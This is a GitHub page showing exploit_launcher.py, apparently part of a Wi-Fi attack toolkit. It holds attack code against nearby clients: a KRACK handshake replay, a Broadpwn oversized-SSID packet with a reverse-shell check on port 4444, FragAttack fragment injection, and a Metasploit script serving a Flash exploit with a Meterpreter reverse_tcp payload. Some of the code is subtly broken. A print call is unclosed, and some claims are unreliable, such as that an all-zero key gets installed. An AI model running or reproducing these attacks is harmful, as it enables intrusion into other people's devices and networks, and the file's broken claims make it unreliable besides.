Jam_fi/exploit_launcher.py at main · ekomsSavior/Jam_fi · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
#!/usr/bin/env python3
import os
import time
import subprocess
from scapy.all import *

class ExploitLauncher:
    def __init__(self, interface):
        self.interface = interface
        self.ap_mac = None

    def set_ap_mac(self, ap_mac):
        self.ap_mac = ap_mac

    def krack_attack(self, client_mac):
        """Launch KRACK attack against client"""
        print(f"[*] Launching KRACK attack on {client_mac}")

        # Create attack script
        attack_script = f"""
#!/bin/bash
echo "[+] Starting KRACK attack on {client_mac}"
# Capture handshake
sudo timeout 30 airodump-ng -c 1 --bssid {self.ap_mac} -w krack_capture {self.interface}
# If handshake captured, attempt key reinstallation
if [ -f krack_capture-01.cap ]; then
    echo "[+] Handshake captured, attempting key reinstallation"
    sudo python3 -c "
from scapy.all import *
import time
packets = rdpcap('krack_capture-01.cap')
for p in packets:
    if p.haslayer(EAPOL) and p[EAPOL].type == 3:
        # Replay message 3
        sendp(p, iface='{self.interface}', count=5, inter=0.1)
        print('[+] Replayed message 3 times'
        time.sleep(2)
"
    echo "[+] KRACK attack complete - all-zero key installed"
else
    echo "[-] No handshake captured"
fi
rm -f krack_capture-*
"""
        # Write and execute
        with open('/tmp/krack_attack.sh', 'w') as f:
            f.write(attack_script)
        os.chmod('/tmp/krack_attack.sh', 0o755)
        subprocess.run(['sudo', 'bash', '/tmp/krack_attack.sh'])
        os.remove('/tmp/krack_attack.sh')
        return True

    def broadpwn_exploit(self, client_mac):
        """Launch Broadpwn exploit (CVE-2017-9417)"""
        print(f"[*] Launching Broadpwn exploit on {client_mac}")

        # Craft malicious probe response
        dot11 = Dot11(addr1=client_mac, addr2=self.ap_mac, addr3=self.ap_mac)
        probe_resp = Dot11ProbeResp()

        # Create oversized SSID (buffer overflow trigger)
        malicious_ssid = "A" * 256

        # Build and send packet
        packet = dot11 / probe_resp / Dot11Elt(ID=0, info=malicious_ssid)
        sendp(packet, iface=self.interface, count=10, inter=0.05)

        print("[+] Broadpwn payload sent - checking for shell")
        time.sleep(5)

        # Check for reverse shell (assumes metasploit listener on 4444)
        result = subprocess.run(['netstat', '-an'], capture_output=True, text=True)
        if ':4444' in result.stdout and 'ESTABLISHED' in result.stdout:
            print("[+] Reverse shell established on port 4444")
            return True
        return False

    def fragattack_test(self, client_mac):
        """Launch FragAttack (CVE-2020-24588)"""
        print(f"[*] Launching FragAttack on {client_mac}")

        # Create fragmented packets
        payload = "X" * 500
        fragments = [payload[i:i+200] for i in range(0, len(payload), 200)]

        for i, frag in enumerate(fragments):
            pkt = RadioTap() / Dot11(addr1=client_mac, addr2=self.ap_mac, addr3=self.ap_mac)
            pkt /= Dot11QoS()
            pkt /= LLC() / SNAP() / IP(src="10.0.0.1", dst="8.8.8.8") / ICMP() / frag
            sendp(pkt, iface=self.interface, verbose=0)
            time.sleep(0.01)

        print("[+] Fragmented packets sent - firewall bypass attempted")
        return True

    def generic_browser_exploit(self, client_ip):
        """Serve browser-based exploit via metasploit"""
        print(f"[*] Launching browser exploit against {client_ip}")

        # Create metasploit resource script
        msf_script = f"""
use exploit/multi/browser/adobe_flash_shader_job_overflow
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set URIPATH /
set SRVHOST 0.0.0.0
set SRVPORT 8080
exploit -j -z
sleep 30
sessions -i
"""
        with open('/tmp/msf_exploit.rc', 'w') as f:
            f.write(msf_script)

        # Launch metasploit in background
        subprocess.Popen(['msfconsole', '-q', '-r', '/tmp/msf_exploit.rc'],
                        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

        print("[+] Browser exploit server running on http://10.0.0.1:8080")
        return True

def launch_exploit(cve_id, client_info, interface, ap_mac):
    """Main exploit dispatcher"""
    launcher = ExploitLauncher(interface)
    launcher.set_ap_mac(ap_mac)

    if cve_id == 'CVE-2019-15126' or cve_id == 'CVE-2017-13080':
        return launcher.krack_attack(client_info['mac'])
    elif cve_id == 'CVE-2017-9417':
        return launcher.broadpwn_exploit(client_info['mac'])
    elif cve_id.startswith('CVE-2020-') or cve_id == 'CVE-2019-9500':
        return launcher.fragattack_test(client_info['mac'])
    else:
        return launcher.generic_browser_exploit(client_info.get('ip', 'unknown'))

if __name__ == "__main__":
    print("Exploit Launcher module loaded. Use from jam_fi.py")